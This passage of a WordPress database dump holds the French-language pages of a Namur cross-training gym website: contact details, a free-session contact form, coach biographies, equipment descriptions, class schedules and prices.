'http://www.crosstrainingcenter.be/?p=263', 0, 'revision', '', 0),
(264, 1, '2013-07-03 20:37:31', '2013-07-03 20:37:31', '<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; width: 50%;\">\r\n<h1>Prise de RDV :</h1>\r\n0485 / 92 . 02 . 12\r\n\r\nLes prises de RDV pour les séances de Team Training, Duo Training, Personnal Trainer ou Coatching nutritionnel se font exclusivement par téléphone.\r\n<h1>Adresse :</h1>\r\nBowling et Squash de Namur\r\nChaussée de Perwez 251\r\n<em id=\"__mceDel\"> 5002 Namur\r\n<a href=\"mailto:info@crosstrainingcenter.be\">info@crosstrainingcenter.be</a></em></td>\r\n<td style=\"border: 0px; width: 50%;\">\r\n<h1>Plan d\'accès :</h1>\r\n<iframe src=\"https://maps.google.be/maps?q=Chauss%C3%A9e+de+Perwez+251+5002+namur&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002&amp;gl=be&amp;t=m&amp;ll=50.4846,4.849863&amp;spn=0.016384,0.025749&amp;z=14&amp;output=embed\" height=\"300\" width=\"300\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"></iframe>\r\n<small><a style=\"color: #0000ff; text-align: left;\" href=\"https://maps.google.be/maps?q=Chauss%C3%A9e+de+Perwez+251+5002+namur&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002&amp;gl=be&amp;t=m&amp;ll=50.4846,4.849863&amp;spn=0.016384,0.025749&amp;z=14&amp;source=embed\">Agrandir le plan</a></small></td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h1>Laissez-nous un message :</h1>\r\n[contact-form-7 id=\"257\" title=\"Contact form 1\"]</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Contact', '', 'inherit', 'open', 'open', '', '9-revision-v1', '', '', '2013-07-03 20:37:31', '2013-07-03 20:37:31', '', 9, 'http://www.crosstrainingcenter.be/?p=264', 0, 'revision', '', 0),
(265, 1, '2013-07-03 20:42:29', '2013-07-03 20:42:29', '<p>Votre nom (obligatoire)<br />\r\n    [text* your-name] <br>\r\nVotre prénom (obligatoire)<br />\r\n    [text* your-firstname] <br>\r\nVotre email (obligatoire)<br />\r\n    [email* your-email] <br>\r\nVotre n° de téléphone (obligatoire)<br />\r\n    [text* your-tel]<br>\r\n[captchac captcha-696]<br>\r\nVeuillez recopier les caractères ci-dessus<br />\r\n    [captchar captcha-696] </p>\r\n\r\n<p>[submit \"Contactez moi pour un RDV Séance Booster\"]</p>\nDemande séance gratuite\n[your-name] <[your-email]>\nDe : [your-name] <[your-email]>\r\nSujet : Demande séance gratuite\r\n\r\nDemande de séance gratuite :\r\n[your-name]\r\n[your-firstname]\r\n[your-email]\r\n[your-tel]\r\n\r\n\r\n--\r\nThis e-mail was sent from a contact form on Cross Training Center (http://www.crosstrainingcenter.be)\njuliepierrard@hotmail.com\n\n\n\n1\nDemande séance gratuite\n[your-name] <[your-email]>\nDe : [your-name] <[your-email]>\r\nSujet : Demande séance gratuite\r\n\r\nDemande de séance gratuite :\r\n[your-name]\r\n[your-firstname]\r\n[your-email]\r\n[your-tel]\r\n\r\n\r\n--\r\nThis e-mail was sent from a contact form on Cross Training Center (http://www.crosstrainingcenter.be)\nstv@otvr.net\n\n\n\nVotre message a bien été envoyé. Merci.\nErreur lors de l\'envoi du message. Veuillez réessayer plus tard ou contacter l\'administrateur d\'une autre manière.\nErreur de validation. Veuillez vérifier les champs et soumettre à nouveau.\nErreur lors de l\'envoi du message. Veuillez réessayer plus tard ou contacter l\'administrateur d\'une autre manière.\nMerci de bien vouloir accepter les conditions pour continuer.\nVeuillez remplir le champ obligatoire.\nLe code entre est incorrect.\nLe format numérique semble invalide.\nCe nombre est trop petit.\nCe nombre est trop grand.\nL\'adresse email semble invalide.\nL\'URL semble invalide.\nLe numéro de téléphone semble invalide.\nImpossible de télécharger le fichier.\nCe type de fichier n\'est pas autorisé.\nCe fichier est trop volumineux.\nImpossible de télécharger le fichier. Une erreur est survenue.\nVotre réponse est incorrecte.\nLe format de date semble invalide.\nCette date est trop tôt.\nCette date est trop tard.', 'Seance_gratuite', '', 'publish', 'open', 'open', '', 'sans-titre', '', '', '2014-08-31 07:40:29', '2014-08-31 07:40:29', '', 0, 'http://www.crosstrainingcenter.be/?post_type=wpcf7_contact_form&#038;p=265', 0, 'wpcf7_contact_form', '', 0),
(266, 1, '2013-07-03 20:43:41', '2013-07-03 20:43:41', '<blockquote>\r\n<h1>Prise de RDV pour une séance booster :</h1>\r\n</blockquote>\r\nPour suivre les cours de Small Group Training, vous devez d\'abord vous inscrire à une séance Booster. Cette séance, sur rendez-vous individuel, avec un coach durera 30 minutes. Durant cette séance, un bilan sera réalisé ainsi qu\'une découverte de l\'ensemble des outils du Cross Training Center.\r\n\r\nLaissez-nous vos coordonnées et nous vous recontacterons afin de planifier avec vous votre séance booster.\r\n\r\n[contact-form-7 id=\"265\" title=\"Seance_gratuite\"]', 'Séance booster', '', 'publish', 'closed', 'open', '', '266-2', '', '', '2014-08-31 07:41:25', '2014-08-31 07:41:25', '', 0, 'http://www.crosstrainingcenter.be/?page_id=266', 0, 'page', '', 0),
(267, 1, '2013-07-03 20:43:41', '2013-07-03 20:43:41', 'Venez découvrir les bienfaits du cross training lors d\'une première séance gratuite.\r\n\r\n[contact-form-7 id=\"265\" title=\"Seance_gratuite\"]', '', '', 'inherit', 'open', 'open', '', '266-revision-v1', '', '', '2013-07-03 20:43:41', '2013-07-03 20:43:41', '', 266, 'http://www.crosstrainingcenter.be/?p=267', 0, 'revision', '', 0),
(268, 1, '2013-07-03 20:38:07', '2013-07-03 20:38:07', '<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; width: 50%;\">\r\n<h1>Prise de RDV :</h1>\r\nLes prises de RDV pour les séances de Team Training, Duo Training, Personnal Trainer ou Coatching nutritionnel se font exclusivement par téléphone.\r\n\r\n0485 / 92 . 02 . 12\r\n<h1>Adresse :</h1>\r\nBowling et Squash de Namur\r\nChaussée de Perwez 251\r\n<em id=\"__mceDel\"> 5002 Namur\r\n<a href=\"mailto:info@crosstrainingcenter.be\">info@crosstrainingcenter.be</a></em></td>\r\n<td style=\"border: 0px; width: 50%;\">\r\n<h1>Plan d\'accès :</h1>\r\n<iframe src=\"https://maps.google.be/maps?q=Chauss%C3%A9e+de+Perwez+251+5002+namur&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002&amp;gl=be&amp;t=m&amp;ll=50.4846,4.849863&amp;spn=0.016384,0.025749&amp;z=14&amp;output=embed\" height=\"300\" width=\"300\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"></iframe>\r\n<small><a style=\"color: #0000ff; text-align: left;\" href=\"https://maps.google.be/maps?q=Chauss%C3%A9e+de+Perwez+251+5002+namur&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002&amp;gl=be&amp;t=m&amp;ll=50.4846,4.849863&amp;spn=0.016384,0.025749&amp;z=14&amp;source=embed\">Agrandir le plan</a></small></td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h1>Laissez-nous un message :</h1>\r\n[contact-form-7 id=\"257\" title=\"Contact form 1\"]</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Contact', '', 'inherit', 'open', 'open', '', '9-revision-v1', '', '', '2013-07-03 20:38:07', '2013-07-03 20:38:07', '', 9, 'http://www.crosstrainingcenter.be/?p=268', 0, 'revision', '', 0),
(269, 1, '2013-07-03 19:59:08', '2013-07-03 19:59:08', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-235 alignleft\" alt=\"julie_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\" width=\"97\" height=\"127\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Pierrard</h2>\r\n<h5>Gérante\r\nCoatch\r\nDiététicienne</h5>\r\n<ul>\r\n	<li>Baccalauréat en diététique</li>\r\n	<li>Spécialisation en diététique du sport</li>\r\n	<li>Enseignante en éducation nutritionnelle</li>\r\n	<li>Pratiquante de judo, natation et cyclisme</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-233 alignleft\" alt=\"damien_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Damien Pierrard</h2>\r\n<h5>Fondateur Pierrard Sports\r\nFormateur coach\r\nCoach</h5>\r\n<ul>\r\n	<li>Licence en éducation physique</li>\r\n	<li>Diplôme universitaire en préparation physique et entrainement des sportifs</li>\r\n	<li>Maitre assistant à l’IES Parnasse-ISEI</li>\r\n	<li>Préparateur physique</li>\r\n	<li>Pratiquant de course à pied, natation et cyclisme</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-234 alignleft\" alt=\"guelor-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/guelor-pti.jpg\" width=\"108\" height=\"141\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Guélor Luabeya</h2>\r\n<h5>Fondateur GLFE consulting\r\nFormateur coach\r\nCoach</h5>\r\n<ul>\r\n	<li>Instructeur de cours collectifs LES MILLS, présenteur international et formateur national</li>\r\n	<li>Premier Trainer National Belge</li>\r\n	<li>Personal trainer (formation Direct Fitness et Les Mills Coach) expert en kettlelbell, VIPR, Body Boxe et TRX</li>\r\n	<li>Ancien footballeur semi-professionnel et passionné de sports de combat</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-237 alignleft\" alt=\"mathieu_gille-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Matthieu Gille</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Préparateur physique en sport collectif et individuel</li>\r\n	<li>Brevet A de l’URBSFA</li>\r\n	<li>Pratiquant de foot, triathlon, tennis et golf</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-232 alignleft\" alt=\"bertrand_bauwin-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Bertrand Bauwin</h2>\r\n<h5>Coatch</h5>\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Spécialisation en psychomotricité</li>\r\n	<li>Préparateur physique et entraineur de football diplômé de l’URBSFA</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot, triathlon, tennis et VTT</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-236 alignleft\" alt=\"julien_meulemans-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julien_meulemans-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julien Meulemans</h2>\r\n<h5>Coatch</h5>\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Maitre psychomotricien</li>\r\n	<li>Formation de personal trainer</li>\r\n	<li>Formation en Streching Global Actif (SGA)</li>\r\n	<li>Formation à l’initiation au golf et snag golf</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot et de ski</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-revision-v1', '', '', '2013-07-03 19:59:08', '2013-07-03 19:59:08', '', 20, 'http://www.crosstrainingcenter.be/?p=269', 0, 'revision', '', 0),
(270, 1, '2013-07-03 19:06:30', '2013-07-03 19:06:30', '<blockquote>\r\n<h2>Le cross training est une méthode d\'entraînement moderne et ludique regroupant les meilleurs exercices issus de différentes disciplines.</h2>\r\n</blockquote>\r\nAfin de vous permettre d\'atteindre vos objectifs, nous avons choisi pour vous plusieurs outils innovants le TRX, le RIP Trainer, le Kettlebell, le ViPR ainsi qu’une multitude de petits matériels (bosu, swissball, plateau freeman, échelle de rythme, …).\r\n<h2></h2>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/trx1.jpg\"><img class=\"alignnone size-full wp-image-68\" alt=\"trx1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/trx1.jpg\" width=\"200\" height=\"200\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>TRX Suspension Training</h1>\r\nConçu à l’origine pour des US Navy SEAL, comme outil d’entrainement, le TRX est utilisé de plus en plus dans les salles de fitness et par des équipes professionnelles pour compléter leurs entrainements. Accessible à tous, le TRX est un système moderne d’entrainement qui utilise le poids du corps pour travailler la force fonctionnelle pure, améliorer la flexibilité, l’équilibre et la stabilité du centre du corps.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/kb.jpg\"><img class=\"alignnone size-full wp-image-70\" alt=\"kb\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/kb.jpg\" width=\"200\" height=\"200\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Kettlebel</h1>\r\nOutil d’entrainement qui a ses origines en Russie. Le Kettlebell permet de cibler des zones musculaires inaccessibles avec les haltères et charges guidées traditionnelles. Il autorise une très grande diversité de mouvements tout en renforçant les muscles des poignets et des avant-bras. Cet outil accroît considérablement la coordination et l\'équilibre. Le travail à l\'aide de Kettlebells fournit une excellente combinaison entre puissance musculaire et stretching en permettant le travail de tous les groupes musculaires inaccessibles avec un entraînement traditionnel.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/vipr-f1.jpg\"><img class=\"alignnone size-full wp-image-72\" alt=\"vipr-f1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/vipr-f1.jpg\" width=\"200\" height=\"200\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>ViPR</h1>\r\nAcronyme pour Vitalité, Performance et Reconditionnement. Le ViPR a été créé à partir de la nécessité de faire évoluer les outils d\'entraînement, de favoriser les mouvements ciblés et de combiner l\'entraînement de force avec un entraînement fonctionnel. La combinaison de levage, de déplacement et de rotation rend cet outil d\'entraînement très efficace.
Pratiquement indestructible et incroyablement fonctionnel, il est conçu pour développer le corps dans son entièreté.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/ript.jpg\"><img class=\"alignnone size-full wp-image-75\" alt=\"ript\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/ript.jpg\" width=\"200\" height=\"200\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>RIP Trainer</h1>\r\nLe Rip Trainer est un des outils les plus efficaces pour les entrainements fonctionnels et pour le renforcement du centre du corps. Il a été conçu par Peter Holman, kinésithérapeute américain. Chaque exercice avec le Rip Trainer exige l\'engagement de toute la ceinture abdominale et entraine le corps à bouger avec plus de puissance et de stabilité.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;', 'Le cross training', '', 'inherit', 'open', 'open', '', '22-revision-v1', '', '', '2013-07-03 19:06:30', '2013-07-03 19:06:30', '', 22, 'http://www.crosstrainingcenter.be/?p=270', 0, 'revision', '', 0),
(271, 1, '2013-07-03 20:01:27', '2013-07-03 20:01:27', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Les séances sont composées de différentes phases décrites selon le planning ci-dessous.\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 50%;\">\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 90%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">Samedi</td>\r\n<td class=\"ttitreh\">Dimanche</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td style=\"width: 50%;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<span style=\"text-decoration: underline;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2>_</h2>\r\n<h2>Duo Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2>_</h2>\r\n<h2>Personal Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2>_</h2>\r\n<h2>Coatching nutritionnel :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>_</h2>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 20:01:27', '2013-07-03 20:01:27', '', 11, 'http://www.crosstrainingcenter.be/?p=271', 0, 'revision', '', 0),
(272, 1, '2013-07-03 19:06:31', '2013-07-03 19:06:31', '<h2>Assurer un entraînement de qualité :</h2>\r\n&nbsp;\r\n\r\n<a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"size-medium wp-image-102 alignleft\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x77.png\" width=\"300\" height=\"77\" /></a>Selon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : <strong>récupérer</strong>, <strong>prévenir</strong> et <strong>améliorer</strong>. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assuré.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h2></h2>\r\n<h2>L\'activité physique, l\'alimentation et le stress : une approche globale</h2>\r\n&nbsp;\r\n\r\n<a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2.png\"><img class=\"size-medium wp-image-103 alignleft\" alt=\"picto2\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2-291x300.png\" width=\"291\" height=\"300\" /></a>Afin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p style=\"text-align: center;\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-07-03 19:06:31', '2013-07-03 19:06:31', '', 5, 'http://www.crosstrainingcenter.be/?p=272', 0, 'revision', '', 0),
(273, 1, '2013-07-03 19:11:58', '2013-07-03 19:11:58', '<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training (réservation obligatoire)</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Prix', '', 'inherit', 'open', 'open', '', '214-revision-8', '', '', '2013-07-03 19:11:58', '2013-07-03 19:11:58', '', 214, 'http://www.crosstrainingcenter.be/?p=273', 0, 'revision', '', 0),
(274, 1, '2013-07-03 20:43:50', '2013-07-03 20:43:50', 'Venez découvrir les bienfaits du cross training lors d\'une première séance gratuite.\r\n\r\n[contact-form-7 id=\"265\" title=\"Seance_gratuite\"]', 'Séance gratuite', '', 'inherit', 'open', 'open', '', '266-revision-v1', '', '', '2013-07-03 20:43:50', '2013-07-03 20:43:50', '', 266, 'http://www.crosstrainingcenter.be/?p=274', 0, 'revision', '', 0),
(275, 1, '2014-08-31 07:37:27', '2014-08-31 07:37:27', '<blockquote>\n<h1>Prise de RDV pour une séance booster :</h1>\n</blockquote>\nVenez nous rencontrer afin de découvrir le déroulement d\'une séance de cross training.\n\nLaissez-nous vos coordonnées et nous vous recontacterons afin de planifier avec vous votre première séance gratuite.\n\n[contact-form-7 id=\"265\" title=\"Seance_gratuite\"]', 'Séance gratuite', '', 'inherit', 'open', 'open', '', '266-autosave-v1', '', '', '2014-08-31 07:37:27', '2014-08-31 07:37:27', '', 266, 'http://www.crosstrainingcenter.be/?p=275', 0, 'revision', '', 0),
